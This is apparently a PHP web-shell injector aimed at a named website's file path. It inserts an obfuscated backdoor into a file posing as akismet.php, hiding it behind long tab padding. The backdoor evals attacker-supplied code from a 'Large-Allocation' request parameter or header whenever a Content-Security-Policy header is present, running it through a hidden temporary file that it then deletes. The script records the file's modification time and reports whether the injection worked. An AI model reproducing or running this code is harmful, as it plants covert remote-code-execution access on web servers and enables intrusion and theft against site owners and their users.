<?php  $path = '/var/www/html/potencialactivo.sumar.com.py/public/vendor/bootstrap/akismet.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24_HEADERS%20%3D%20getallheaders%28%29%3Bif%28isset%28%24_HEADERS%5B%27Content-Security-Policy%27%5D%29%29%7B%24c%3D%22%3C%5Cx3fp%5Cx68p%5Cx20%40%5Cx65v%5Cx61l%5Cx28%24%5Cx5fR%5Cx45Q%5Cx55E%5Cx53T%5Cx5b%5C%22%5Cx4ca%5Cx72g%5Cx65-%5Cx41l%5Cx6co%5Cx63a%5Cx74i%5Cx6fn%5Cx22%5D%5Cx29%3B%5Cx40e%5Cx76a%5Cx6c%28%5Cx24_%5Cx48E%5Cx41D%5Cx45R%5Cx53%5B%5Cx22L%5Cx61r%5Cx67e%5Cx2dA%5Cx6cl%5Cx6fc%5Cx61t%5Cx69o%5Cx6e%5C%22%5Cx5d%29%5Cx3b%22%3B%24f%3D%27/tmp/.%27.time%28%29%3B%40file_put_contents%28%24f%2C%20%24c%29%3B%40include%28%24f%29%3B%40unlink%28%24f%29%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');